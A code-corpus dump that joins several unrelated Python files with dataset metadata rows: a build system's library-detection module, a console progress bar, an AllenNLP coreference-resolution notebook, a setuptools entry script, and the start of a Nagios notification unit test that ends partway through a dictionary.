librariesByName = dict(_discoverLibraries(locals().itervalues()))
def allDependencies(makeNames):
'''Compute the set of all directly and indirectly required libraries to
build and use the given set of libraries.
Returns the make names of the required libraries.
'''
# Compute the reflexive-transitive closure.
transLibs = set()
newLibs = set(makeNames)
while newLibs:
transLibs.update(newLibs)
newLibs = set(
depMakeName
for makeName in newLibs
for depMakeName in librariesByName[makeName].dependsOn
if depMakeName not in transLibs
)
return transLibs
| 29.937605 | 92 | 0.694756 |
from executils import captureStdout, shjoin
from os import listdir
from os.path import isdir, isfile
from os import environ
class Library(object):
libName = None
makeName = None
header = None
configScriptName = None
dynamicLibsOption = '--libs'
staticLibsOption = None
function = None
dependsOn = ()
@classmethod
def isSystemLibrary(cls, platform):
return False
@classmethod
def getConfigScript(
cls, platform, linkStatic, distroRoot
):
scriptName = cls.configScriptName
if scriptName is None:
return None
elif platform == 'dingux' and cls.isSystemLibrary(platform):
return '/opt/a320-toolchain/usr/mipsel-a320-linux-uclibc/sysroot/usr/bin/%s' % scriptName
elif distroRoot is None:
return scriptName
else:
return '%s/bin/%s' % (distroRoot, scriptName)
@classmethod
def getHeaders(cls, platform):
header = cls.header
return header if hasattr(header, '__iter__') else (header, )
@classmethod
def getLibName(cls, platform):
return cls.libName
@classmethod
def getCompileFlags(cls, platform, linkStatic, distroRoot):
if platform == 'android':
return environ['ANDROID_CXXFLAGS']
configScript = cls.getConfigScript(platform, linkStatic, distroRoot)
if configScript is not None:
flags = [ '`%s --cflags`' % configScript ]
elif distroRoot is None or cls.isSystemLibrary(platform):
flags = []
else:
flags = [ '-I%s/include' % distroRoot ]
dependentFlags = [
librariesByName[name].getCompileFlags(
platform, linkStatic, distroRoot
)
for name in cls.dependsOn
]
return ' '.join(flags + dependentFlags)
@classmethod
def getLinkFlags(cls, platform, linkStatic, distroRoot):
if platform == 'android':
return environ['ANDROID_LDFLAGS']
configScript = cls.getConfigScript(platform, linkStatic, distroRoot)
if configScript is not None:
libsOption = (
cls.dynamicLibsOption
if not linkStatic or cls.isSystemLibrary(platform)
else cls.staticLibsOption
)
if libsOption is not None:
return '`%s %s`' % (configScript, libsOption)
if distroRoot is None or cls.isSystemLibrary(platform):
return '-l%s' % cls.getLibName(platform)
else:
flags = [
'%s/lib/lib%s.a' % (distroRoot, cls.getLibName(platform))
] if linkStatic else [
'-L%s/lib -l%s' % (distroRoot, cls.getLibName(platform))
]
dependentFlags = [
librariesByName[name].getLinkFlags(
platform, linkStatic, distroRoot
)
for name in cls.dependsOn
]
systemDependentFlags = list(cls.getSystemDependentFlags(platform))
return ' '.join(flags + dependentFlags + systemDependentFlags)
@classmethod
def getSystemDependentFlags(cls, platform):
return ()
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
configScript = cls.getConfigScript(platform, linkStatic, distroRoot)
if configScript is None:
return 'unknown'
else:
return '`%s --version`' % configScript
class FreeType(Library):
libName = 'freetype'
makeName = 'FREETYPE'
header = ('<ft2build.h>', 'FT_FREETYPE_H')
configScriptName = 'freetype-config'
function = 'FT_Open_Face'
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
@classmethod
def getConfigScript(cls, platform, linkStatic, distroRoot):
if platform in ('netbsd', 'openbsd'):
if distroRoot == '/usr/local':
distroRoot = '/usr/X11R6'
return super(FreeType, cls).getConfigScript(
platform, linkStatic, distroRoot
)
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
configScript = cls.getConfigScript(platform, linkStatic, distroRoot)
return '`%s --ftversion`' % configScript
class GL(Library):
libName = 'GL'
makeName = 'GL'
function = 'glGenTextures'
@classmethod
def isSystemLibrary(cls, platform):
return not platform.endswith('bsd')
@classmethod
def getHeaders(cls, platform):
if platform == 'darwin':
return ('<OpenGL/gl.h>', )
else:
return ('<GL/gl.h>', )
@classmethod
def getCompileFlags(cls, platform, linkStatic, distroRoot):
if platform in ('netbsd', 'openbsd'):
return '-I/usr/X11R6/include -I/usr/X11R7/include'
else:
return super(GL, cls).getCompileFlags(
platform, linkStatic, distroRoot
)
@classmethod
def getLinkFlags(cls, platform, linkStatic, distroRoot):
if platform == 'darwin':
return '-framework OpenGL'
elif platform.startswith('mingw'):
return '-lopengl32'
elif platform in ('netbsd', 'openbsd'):
return '-L/usr/X11R6/lib -L/usr/X11R7/lib -lGL'
else:
return super(GL, cls).getLinkFlags(platform, linkStatic, distroRoot)
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
def execute(cmd, log):
versionPairs = tuple(
( major, minor )
for major in range(1, 10)
for minor in range(0, 10)
)
version = cmd.expand(log, cls.getHeaders(platform), *(
'GL_VERSION_%d_%d' % pair for pair in versionPairs
))
try:
return '%d.%d' % max(
ver
for ver, exp in zip(versionPairs, version)
if exp is not None
)
except ValueError:
return None
return execute
class GLEW(Library):
makeName = 'GLEW'
header = '<GL/glew.h>'
function = 'glewInit'
dependsOn = ('GL', )
@classmethod
def getLibName(cls, platform):
if platform.startswith('mingw'):
return 'glew32'
else:
return 'GLEW'
@classmethod
def getCompileFlags(cls, platform, linkStatic, distroRoot):
flags = super(GLEW, cls).getCompileFlags(
platform, linkStatic, distroRoot
)
if platform.startswith('mingw') and linkStatic:
return '%s -DGLEW_STATIC' % flags
else:
return flags
class LibPNG(Library):
libName = 'png12'
makeName = 'PNG'
header = '<png.h>'
configScriptName = 'libpng-config'
dynamicLibsOption = '--ldflags'
function = 'png_write_image'
dependsOn = ('ZLIB', )
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
class LibXML2(Library):
libName = 'xml2'
makeName = 'XML'
header = '<libxml/parser.h>'
configScriptName = 'xml2-config'
function = 'xmlParseDocument'
dependsOn = ('ZLIB', )
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android',)
@classmethod
def getCompileFlags(cls, platform, linkStatic, distroRoot):
flags = super(LibXML2, cls).getCompileFlags(
platform, linkStatic, distroRoot
)
if not linkStatic or cls.isSystemLibrary(platform):
return flags
else:
return flags + ' -DLIBXML_STATIC'
class OGG(Library):
libName = 'ogg'
makeName = 'OGG'
header = '<ogg/ogg.h>'
function = 'ogg_stream_init'
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
class SDL(Library):
libName = 'SDL'
makeName = 'SDL'
header = '<SDL.h>'
configScriptName = 'sdl-config'
staticLibsOption = '--static-libs'
function = 'SDL_Init'
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
class SDL_ttf(Library):
libName = 'SDL_ttf'
makeName = 'SDL_TTF'
header = '<SDL_ttf.h>'
function = 'TTF_OpenFont'
dependsOn = ('SDL', 'FREETYPE')
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
def execute(cmd, log):
version = cmd.expand(log, cls.getHeaders(platform),
'SDL_TTF_MAJOR_VERSION',
'SDL_TTF_MINOR_VERSION',
'SDL_TTF_PATCHLEVEL',
)
return None if None in version else '%s.%s.%s' % version
return execute
class TCL(Library):
libName = 'tcl'
makeName = 'TCL'
header = '<tcl.h>'
function = 'Tcl_CreateInterp'
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android',)
@classmethod
def getTclConfig(cls, platform, distroRoot):
if hasattr(cls, 'tclConfig'):
return cls.tclConfig
def iterLocations():
if platform == 'android':
sdl_android_port_path = environ['SDL_ANDROID_PORT_PATH']
libpath = sdl_android_port_path + '/project/libs/armeabi'
yield libpath
tclpath = sdl_android_port_path + '/project/jni/tcl8.5/unix'
yield tclpath
else:
if distroRoot is None or cls.isSystemLibrary(platform):
roots = ('/usr/local', '/usr')
else:
roots = (distroRoot, )
for root in roots:
if isdir(root):
for libdir in ('lib', 'lib64', 'lib/tcl'):
libpath = root + '/' + libdir
if isdir(libpath):
yield libpath
for entry in listdir(libpath):
if entry.startswith('tcl8.'):
tclpath = libpath + '/' + entry
if isdir(tclpath):
yield tclpath
tclConfigs = {}
log = open('derived/tcl-search.log', 'w')
print >> log, 'Looking for Tcl...'
try:
for location in iterLocations():
path = location + '/tclConfig.sh'
if isfile(path):
print >> log, 'Config script:', path
text = captureStdout(
log,
"sh -c '. %s && echo %s'" % (
path, '$TCL_MAJOR_VERSION $TCL_MINOR_VERSION'
)
)
if text is not None:
try:
major, minor = text.split()
version = int(major), int(minor)
except ValueError:
pass
else:
print >> log, 'Found: version %d.%d' % version
tclConfigs[path] = version
try:
tclConfig = min(
( version, path )
for path, version in tclConfigs.iteritems()
if version >= (8, 5)
)[1]
except ValueError:
tclConfig = None
print >> log, 'No suitable versions found.'
else:
print >> log, 'Selected:', tclConfig
finally:
log.close()
cls.tclConfig = tclConfig
return tclConfig
@classmethod
def evalTclConfigExpr(cls, platform, distroRoot, expr, description):
tclConfig = cls.getTclConfig(platform, distroRoot)
if tclConfig is None:
return None
log = open('derived/tcl-search.log', 'a')
try:
print >> log, 'Getting Tcl %s...' % description
text = captureStdout(
log,
shjoin([
'sh', '-c',
'. %s && eval "echo \\"%s\\""' % (tclConfig, expr)
])
)
if text is not None:
print >> log, 'Result: %s' % text.strip()
finally:
log.close()
return None if text is None else text.strip()
@classmethod
def getCompileFlags(cls, platform, linkStatic, distroRoot):
if platform == 'android':
return environ['ANDROID_CXXFLAGS']
wantShared = not linkStatic or cls.isSystemLibrary(platform)
return cls.evalTclConfigExpr(
platform,
distroRoot,
'${TCL_INCLUDE_SPEC}' + ('' if wantShared else ' -DSTATIC_BUILD'),
'compile flags'
)
@classmethod
def getLinkFlags(cls, platform, linkStatic, distroRoot):
if platform == 'android':
return environ['ANDROID_LDFLAGS']
wantShared = not linkStatic or cls.isSystemLibrary(platform)
tclShared = cls.evalTclConfigExpr(
platform,
distroRoot,
'${TCL_SHARED_BUILD}',
'library type (shared/static)'
)
log = open('derived/tcl-search.log', 'a')
try:
if tclShared == '0':
if wantShared:
print >> log, (
'Dynamic linking requested, but Tcl installation has '
'static library.'
)
return None
elif tclShared == '1':
if not wantShared:
print >> log, (
'Static linking requested, but Tcl installation has '
'dynamic library.'
)
return None
else:
print >> log, (
'Unable to determine whether Tcl installation has '
'shared or static library.'
)
return None
finally:
log.close()
if wantShared:
return cls.evalTclConfigExpr(
platform,
distroRoot,
'${TCL_LIB_SPEC}',
'dynamic link flags'
)
else:
return cls.evalTclConfigExpr(
platform,
distroRoot,
'${TCL_EXEC_PREFIX}/lib/${TCL_LIB_FILE} ${TCL_LIBS}',
'static link flags'
)
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
return cls.evalTclConfigExpr(
platform,
distroRoot,
'${TCL_MAJOR_VERSION}.${TCL_MINOR_VERSION}${TCL_PATCH_LEVEL}',
'version'
)
class Theora(Library):
libName = 'theoradec'
makeName = 'THEORA'
header = '<theora/theoradec.h>'
function = 'th_decode_ycbcr_out'
dependsOn = ('OGG', )
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
class Vorbis(Library):
libName = 'vorbis'
makeName = 'VORBIS'
header = '<vorbis/codec.h>'
function = 'vorbis_synthesis_pcmout'
dependsOn = ('OGG', )
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
class ZLib(Library):
libName = 'z'
makeName = 'ZLIB'
header = '<zlib.h>'
function = 'inflate'
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
def execute(cmd, log):
version = cmd.expand(log, cls.getHeaders(platform), 'ZLIB_VERSION')
return None if version is None else version.strip('"')
return execute
# Build a dictionary of libraries using introspection.
def _discoverLibraries(localObjects):
for obj in localObjects:
if isinstance(obj, type) and issubclass(obj, Library):
if not (obj is Library):
yield obj.makeName, obj
librariesByName = dict(_discoverLibraries(locals().itervalues()))
def allDependencies(makeNames):
# Compute the reflexive-transitive closure.
transLibs = set()
newLibs = set(makeNames)
while newLibs:
transLibs.update(newLibs)
newLibs = set(
depMakeName
for makeName in newLibs
for depMakeName in librariesByName[makeName].dependsOn
if depMakeName not in transLibs
)
return transLibs
| true | true |
f72ec2738fdcaa32e93f95407b764fa52d3f3f71 | 598 | py | Python | lixian_progress.py | 1py/xunlei-lixian | 1881932b9d5ccba78c7788fbad12982e05bf7f86 | [
"MIT"
] | 2,177 | 2015-01-02T09:56:51.000Z | 2022-03-27T01:48:37.000Z | lixian_progress.py | 1py/xunlei-lixian | 1881932b9d5ccba78c7788fbad12982e05bf7f86 | [
"MIT"
] | 29 | 2015-01-24T17:38:59.000Z | 2021-08-29T03:39:30.000Z | lixian_progress.py | 1py/xunlei-lixian | 1881932b9d5ccba78c7788fbad12982e05bf7f86 | [
"MIT"
] | 516 | 2015-01-02T18:48:29.000Z | 2022-01-26T07:12:35.000Z |
import sys
class SimpleProgressBar:
def __init__(self):
self.displayed = False
def update(self, percent):
self.displayed = True
bar_size = 40
percent *= 100.0
if percent > 100:
percent = 100.0
dots = int(bar_size * percent / 100)
plus = percent / 100 * bar_size - dots
if plus > 0.8:
plus = '='
elif plus > 0.4:
plus = '-'
else:
plus = ''
percent = int(percent)
bar = '=' * dots + plus
bar = '{0:>3}%[{1:<40}]'.format(percent, bar)
sys.stdout.write('\r'+bar)
sys.stdout.flush()
def done(self):
if self.displayed:
print
self.displayed = False
| 19.290323 | 47 | 0.607023 |
import sys
class SimpleProgressBar:
def __init__(self):
self.displayed = False
def update(self, percent):
self.displayed = True
bar_size = 40
percent *= 100.0
if percent > 100:
percent = 100.0
dots = int(bar_size * percent / 100)
plus = percent / 100 * bar_size - dots
if plus > 0.8:
plus = '='
elif plus > 0.4:
plus = '-'
else:
plus = ''
percent = int(percent)
bar = '=' * dots + plus
bar = '{0:>3}%[{1:<40}]'.format(percent, bar)
sys.stdout.write('\r'+bar)
sys.stdout.flush()
def done(self):
if self.displayed:
print
self.displayed = False
| true | true |
f72ec42eb3efc0949d13fb798398c8eed884a8bb | 2,368 | py | Python | triplet_to_text/code_/coreference_resolver/allennlp_coreference_resolution.py | kracr/OntoLearnBench | c1ca89acd6862fcd6954a62d83c43b2236cdc695 | [
"Apache-2.0"
] | 1 | 2022-02-11T19:36:40.000Z | 2022-02-11T19:36:40.000Z | triplet_to_text/code_/coreference_resolver/allennlp_coreference_resolution.py | kracr/OntoLearnBench | c1ca89acd6862fcd6954a62d83c43b2236cdc695 | [
"Apache-2.0"
] | null | null | null | triplet_to_text/code_/coreference_resolver/allennlp_coreference_resolution.py | kracr/OntoLearnBench | c1ca89acd6862fcd6954a62d83c43b2236cdc695 | [
"Apache-2.0"
] | 1 | 2021-06-08T18:54:40.000Z | 2021-06-08T18:54:40.000Z | #!/usr/bin/env python
# coding: utf-8
# In[1]:
from allennlp.predictors.predictor import Predictor
# ## Instantiate AllenNLP `Predictor`
# 1. Load the same model that is used in the [demo](https://demo.allennlp.org/coreference-resolution) (*don't get alarmed by the warning - we don't need to fine-tune the model to use it*).
# 2. Get the prediction :)
# In[2]:
model_url = 'https://storage.googleapis.com/allennlp-public-models/coref-spanbert-large-2020.02.27.tar.gz'
predictor = Predictor.from_path(model_url)
# In[3]:
text = "Eva and Martha didn't want their friend Jenny to feel lonely so they invited her to the party in Las Vegas."
prediction = predictor.predict(document=text)
# ## Coreference resolution with `Allen Institute`
# What we get as a result (`prediction`) is a dictionary as Allen outputs multiple different information at once.
# The ones that we found to be using the most are:
#
# | Key | Type | Description
# |:--------------------------|:-------------------|:----------------------------------------------------
# | `top_spans` | `List[List[int]]` | List of `spaCy` token indices pairs representing spans
# | `document` | `List[str]` | Document's tokens (from `spaCy`; but represented as string not Token)
# | `clusters` | `List[List[List[int]]]` | Clusters of spans (represented by token indices pairs)
# In[4]:
# it's our original text (with extra whitespaces as we trivialy just joined tokens with ' ')
' '.join(prediction['document'])
# In[5]:
# and the found clusters - however, they are not easily understood...
prediction['clusters']
# In[6]:
# but that's how it looks after coreference resolution (notice the possessive!)
predictor.coref_resolved(text)
# As Allen's coreference resolution `Predictor` has quite a limited number of functionalities, in order to turn its output to a more readable one, we need to manually write some functions:
# In[7]:
def get_span_words(span, document):
return ' '.join(document[span[0]:span[1]+1])
def print_clusters(prediction):
document, clusters = prediction['document'], prediction['clusters']
for cluster in clusters:
print(get_span_words(cluster[0], document) + ': ', end='')
print(f"[{'; '.join([get_span_words(span, document) for span in cluster])}]")
# In[8]:
print_clusters(prediction)
| 29.234568 | 188 | 0.669341 |
from allennlp.predictors.predictor import Predictor
odels/coref-spanbert-large-2020.02.27.tar.gz'
predictor = Predictor.from_path(model_url)
text = "Eva and Martha didn't want their friend Jenny to feel lonely so they invited her to the party in Las Vegas."
prediction = predictor.predict(document=text)
# ## Coreference resolution with `Allen Institute`
# What we get as a result (`prediction`) is a dictionary as Allen outputs multiple different information at once.
# The ones that we found to be using the most are:
#
# | Key | Type | Description
# |:--------------------------|:-------------------|:----------------------------------------------------
# | `top_spans` | `List[List[int]]` | List of `spaCy` token indices pairs representing spans
# | `document` | `List[str]` | Document's tokens (from `spaCy`; but represented as string not Token)
' '.join(prediction['document'])
# In[5]:
# and the found clusters - however, they are not easily understood...
prediction['clusters']
# In[6]:
# but that's how it looks after coreference resolution (notice the possessive!)
predictor.coref_resolved(text)
# In[7]:
def get_span_words(span, document):
return ' '.join(document[span[0]:span[1]+1])
def print_clusters(prediction):
document, clusters = prediction['document'], prediction['clusters']
for cluster in clusters:
print(get_span_words(cluster[0], document) + ': ', end='')
print(f"[{'; '.join([get_span_words(span, document) for span in cluster])}]")
# In[8]:
print_clusters(prediction)
| true | true |
f72ec4c3bf5925d67bf0defaf42a32236624789c | 1,002 | py | Python | venv/Scripts/futurize-script.py | saurabhjha137/OCR_using_tesseract | d852865086a7a104f74866411058e51f407b5f6c | [
"Apache-1.1"
] | null | null | null | venv/Scripts/futurize-script.py | saurabhjha137/OCR_using_tesseract | d852865086a7a104f74866411058e51f407b5f6c | [
"Apache-1.1"
] | null | null | null | venv/Scripts/futurize-script.py | saurabhjha137/OCR_using_tesseract | d852865086a7a104f74866411058e51f407b5f6c | [
"Apache-1.1"
] | null | null | null | #!"f:\opencv projects\tesseract ocr\venv\scripts\python.exe"
# EASY-INSTALL-ENTRY-SCRIPT: 'future==0.18.2','console_scripts','futurize'
import re
import sys
# for compatibility with easy_install; see #2198
__requires__ = 'future==0.18.2'
try:
from importlib.metadata import distribution
except ImportError:
try:
from importlib_metadata import distribution
except ImportError:
from pkg_resources import load_entry_point
def importlib_load_entry_point(spec, group, name):
dist_name, _, _ = spec.partition('==')
matches = (
entry_point
for entry_point in distribution(dist_name).entry_points
if entry_point.group == group and entry_point.name == name
)
return next(matches).load()
globals().setdefault('load_entry_point', importlib_load_entry_point)
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(load_entry_point('future==0.18.2', 'console_scripts', 'futurize')())
| 29.470588 | 81 | 0.702595 |
import re
import sys
quires__ = 'future==0.18.2'
try:
from importlib.metadata import distribution
except ImportError:
try:
from importlib_metadata import distribution
except ImportError:
from pkg_resources import load_entry_point
def importlib_load_entry_point(spec, group, name):
dist_name, _, _ = spec.partition('==')
matches = (
entry_point
for entry_point in distribution(dist_name).entry_points
if entry_point.group == group and entry_point.name == name
)
return next(matches).load()
globals().setdefault('load_entry_point', importlib_load_entry_point)
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(load_entry_point('future==0.18.2', 'console_scripts', 'futurize')())
| true | true |
f72ec7cea5ff8e51a73eb0ada22fc04b55636c4f | 9,232 | py | Python | python/nagcat/unittests/test_notify.py | marineam/nagcat | 445d0efe1fb2ec93c31d1f9d8fa0c0563189ffaf | [
"Apache-2.0"
] | null | null | null | python/nagcat/unittests/test_notify.py | marineam/nagcat | 445d0efe1fb2ec93c31d1f9d8fa0c0563189ffaf | [
"Apache-2.0"
] | null | null | null | python/nagcat/unittests/test_notify.py | marineam/nagcat | 445d0efe1fb2ec93c31d1f9d8fa0c0563189ffaf | [
"Apache-2.0"
] | null | null | null | # Copyright 2010 ITA Software, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from twisted.trial import unittest
from nagcat import notify
import coil
ENVIRONMENT_HOST = {
# Host Macros
'NAGIOS_HOSTNAME': "localhost",
'NAGIOS_HOSTDISPLAYNAME': "localhost",
'NAGIOS_HOSTALIAS': "localhost",
'NAGIOS_HOSTADDRESS': "127.0.0.1",
'NAGIOS_HOSTSTATE': "UP",
'NAGIOS_HOSTSTATEID': "0",
'NAGIOS_LASTHOSTSTATE': "UP",
'NAGIOS_LASTHOSTSTATEID': "0",
'NAGIOS_HOSTSTATETYPE': "HARD",
'NAGIOS_HOSTATTEMPT': "1",
'NAGIOS_MAXHOSTATTEMPTS': "3",
'NAGIOS_HOSTEVENTID': "0",
'NAGIOS_LASTHOSTEVENTID': "0",
'NAGIOS_HOSTPROBLEMID': "0",
'NAGIOS_LASTHOSTPROBLEMID': "0",
'NAGIOS_HOSTLATENCY': "0.123",
'NAGIOS_HOSTEXECUTIONTIME': "4.012",
'NAGIOS_HOSTDURATION': "35d 15h 31m 49s",
'NAGIOS_HOSTDURATIONSEC': "3079909",
'NAGIOS_HOSTDOWNTIME': "0",
'NAGIOS_HOSTPERCENTCHANGE': "0.0",
'NAGIOS_HOSTGROUPNAMES': "a_group,b_group",
'NAGIOS_LASTHOSTCHECK': "1260009929",
'NAGIOS_LASTHOSTSTATECHANGE': "1256929950",
'NAGIOS_LASTHOSTUP': "1260009939",
'NAGIOS_LASTHOSTDOWN': "0",
'NAGIOS_LASTHOSTUNREACHABLE': "0",
'NAGIOS_HOSTOUTPUT': "PING OK - Packet loss = 0%, RTA = 2.00 ms",
'NAGIOS_LONGHOSTOUTPUT': "",
'NAGIOS_HOSTPERFDATA': "rta=10.778000ms;3000.000000;5000.000000;0.000000 pl=0%;80;100;0",
'NAGIOS_HOSTCHECKCOMMAND': "check_host_alive",
'NAGIOS_HOSTACTIONURL': "",
'NAGIOS_HOSTNOTESURL': "",
'NAGIOS_HOSTNOTES': "",
'NAGIOS_TOTALHOSTSERVICES': "39",
'NAGIOS_TOTALHOSTSERVICESOK': "38",
'NAGIOS_TOTALHOSTSERVICESWARNING': "0",
'NAGIOS_TOTALHOSTSERVICESCRITICAL': "1",
'NAGIOS_TOTALHOSTSERVICESUNKNOWN': "0",
# Host Group Macros
'NAGIOS_HOSTGROUPNAME': "a_group",
'NAGIOS_HOSTGROUPALIAS': "A Group",
'NAGIOS_HOSTGROUPMEMBERS': "localhost",
'NAGIOS_HOSTGROUPNOTES': "",
'NAGIOS_HOSTGROUPNOTESURL': "",
'NAGIOS_HOSTGROUPACTIONURL': "",
# Contact Macros
'NAGIOS_CONTACTNAME': "root",
'NAGIOS_CONTACTALIAS': "Mr. Big",
'NAGIOS_CONTACTEMAIL': "root@localhost",
'NAGIOS_CONTACTPAGER': "pager@localhost",
'NAGIOS_CONTACTGROUPNAMES': "admins,managers",
# The address fields could be anything...
#'NAGIOS_CONTACTADDRESS0': "",
# Contact Group Macros
'NAGIOS_CONTACTGROUPNAME': "admins",
'NAGIOS_CONTACTGROUPALIAS': "Admins",
'NAGIOS_CONTACTGROUPMEMBERS': "root,luser",
# Summary Macros (NAGIOS_TOTAL*) are not always available
# so they are not included here...
# Notification Macros
'NAGIOS_NOTIFICATIONTYPE': "PROBLEM",
'NAGIOS_NOTIFICATIONRECIPIENTS': "root",
'NAGIOS_NOTIFICATIONISESCALATED': "0",
'NAGIOS_NOTIFICATIONAUTHOR': "",
'NAGIOS_NOTIFICATIONAUTHORNAME': "",
'NAGIOS_NOTIFICATIONAUTHORALIAS': "",
'NAGIOS_NOTIFICATIONCOMMENT': "",
'NAGIOS_NOTIFICATIONNUMBER': "1",
'NAGIOS_HOSTNOTIFICATIONNUMBER': "0",
'NAGIOS_HOSTNOTIFICATIONID': "0",
'NAGIOS_SERVICENOTIFICATIONNUMBER': "1",
'NAGIOS_SERVICENOTIFICATIONID': "409161",
# Date/Time Macros
'NAGIOS_LONGDATETIME': "Sun Dec 6 04:25:32 EST 2009",
'NAGIOS_SHORTDATETIME': "12-06-2009 04:25:33",
'NAGIOS_DATE': "12-06-2009",
'NAGIOS_TIME': "04:25:34",
'NAGIOS_TIMET': "1260091534",
# File Macros:
'NAGIOS_MAINCONFIGFILE': "/path/to/nagios.cfg",
'NAGIOS_STATUSDATAFILE': "/path/to/status.dat",
'NAGIOS_RETENTIONDATAFILE': "/path/to/retention.dat",
'NAGIOS_OBJECTCACHEFILE': "/path/to/objects.cache",
'NAGIOS_TEMPFILE': "/path/to/nagios.tmp",
'NAGIOS_TEMPPATH': "/tmp",
'NAGIOS_LOGFILE': "/path/to/nagios.log",
'NAGIOS_RESOURCEFILE': "/path/to/resource.cfg",
'NAGIOS_COMMANDFILE': "/path/to/nagios.cmd",
# Misc Macros:
'NAGIOS_PROCESSSTARTTIME': "1259966149",
'NAGIOS_EVENTSTARTTIME': "1259966149",
'NAGIOS_ADMINEMAIL': "root@localhost",
'NAGIOS_ADMINPAGER': "pager@localhost",
# These are available but could be anything...
#'NAGIOS_ARG0': "",
#'NAGIOS_USER0': "",
}
ENVIRONMENT_SERVICE = {
# Service Macros
'NAGIOS_SERVICEDESC': "PING",
'NAGIOS_SERVICEDISPLAYNAME': "PING",
'NAGIOS_SERVICESTATE': "CRITICAL",
'NAGIOS_SERVICESTATEID': "2",
'NAGIOS_LASTSERVICESTATE': "CRITICAL",
'NAGIOS_LASTSERVICESTATEID': "2",
'NAGIOS_SERVICESTATETYPE': "HARD",
'NAGIOS_SERVICEATTEMPT': "3",
'NAGIOS_MAXSERVICEATTEMPTS': "3",
'NAGIOS_SERVICEISVOLATILE': "0",
'NAGIOS_SERVICEEVENTID': "56460",
'NAGIOS_LASTSERVICEEVENTID': "56405",
'NAGIOS_SERVICEPROBLEMID': "28201",
'NAGIOS_LASTSERVICEPROBLEMID': "0",
'NAGIOS_SERVICELATENCY': "0.357",
'NAGIOS_SERVICEEXECUTIONTIME': "0.000",
'NAGIOS_SERVICEDURATION': "0d 0h 0m 17s",
'NAGIOS_SERVICEDURATIONSEC': "17",
'NAGIOS_SERVICEDOWNTIME': "0",
'NAGIOS_SERVICEPERCENTCHANGE': "12.37",
'NAGIOS_SERVICEGROUPNAMES': "z_gorup,y_group",
'NAGIOS_LASTSERVICECHECK': "1260146052",
'NAGIOS_LASTSERVICESTATECHANGE': "1260146112",
'NAGIOS_LASTSERVICEOK': "1260146052",
'NAGIOS_LASTSERVICEWARNING': "1260091455",
'NAGIOS_LASTSERVIVECRITICAL': "1260146112",
'NAGIOS_LASTSERVICEUNKNOWN': "1257999616",
'NAGIOS_SERVICEOUTPUT': "PING CRITICAL - Packet loss = 60%, RTA = 0.38 ms",
'NAGIOS_LONGSERVICEOUTPUT': "Long Output\\nWith\\nextra lines",
'NAGIOS_SERVICEPERFDATA': "",
'NAGIOS_SERVICECHECKCOMMAND': "check_freshness",
'NAGIOS_SERVICEACTIONURL': "",
'NAGIOS_SERVICENOTESURL': "",
'NAGIOS_SERVICENOTES': "",
# Service Group Macros
'NAGIOS_SERVICEGROUPNAME': "z_group",
'NAGIOS_SERVICEGROUPALIAS': "Z Group",
'NAGIOS_SERVICEGROUPMEMBERS': "localhost,PING,otherhost,PING",
'NAGIOS_SERVICEGROUPNOTESURL': "",
'NAGIOS_SERVICEGROUPNOTES': "",
}
ENVIRONMENT_SERVICE.update(ENVIRONMENT_HOST)
class MacrosTestCase(unittest.TestCase):
def setUp(self):
self.macros = notify.Macros(ENVIRONMENT_SERVICE)
def testPrefix(self):
for key in self.macros:
self.failIf(key.startswith("NAGIOS_"))
def testNewlines(self):
for key, value in self.macros.iteritems():
if key == "LONGSERVICEOUTPUT":
self.assert_(len(value.splitlines()) > 1)
else:
self.assert_(not value or len(value.splitlines()) == 1)
def testMissing(self):
self.assertRaises(notify.MissingMacro,
lambda: self.macros['DOESNOTEXIST'])
class NotificationTest(unittest.TestCase):
def setUp(self):
self.macros = {
'host': notify.Macros(ENVIRONMENT_HOST),
'service': notify.Macros(ENVIRONMENT_SERVICE)}
self.config = coil.parse(notify.DEFAULT_CONFIG)
def testSubject(self):
for t in ('host', 'service'):
obj = notify.Notification(t, self.macros[t], self.config)
self.assert_(obj.subject())
def testBody(self):
for t in ('host', 'service'):
obj = notify.Notification(t, self.macros[t], self.config)
long = obj.body()
self.assert_(long)
self.failIf(re.search('{\w+}', long))
obj.format = "short"
short = obj.body()
self.assert_(short)
self.failIf(re.search('{\w+}', short))
self.assert_(len(short) < len(long))
def testURLs(self):
config = self.config.copy()
config['urls.nagios'] ="https://testURLs/zomg/nagios"
config['urls.graphs'] ="https://testURLs/zomg/graphs"
for t in ('host', 'service'):
obj = notify.Notification(t, self.macros[t], config)
urls = obj.urls()
self.assert_(urls['nagios'].startswith(config['urls.nagios']))
self.assert_(urls['graphs'].startswith(config['urls.graphs']))
| 40.31441 | 102 | 0.603986 |
import re
from twisted.trial import unittest
from nagcat import notify
import coil
ENVIRONMENT_HOST = {
'NAGIOS_HOSTNAME': "localhost",
'NAGIOS_HOSTDISPLAYNAME': "localhost",
'NAGIOS_HOSTALIAS': "localhost",
'NAGIOS_HOSTADDRESS': "127.0.0.1",
'NAGIOS_HOSTSTATE': "UP",
'NAGIOS_HOSTSTATEID': "0",
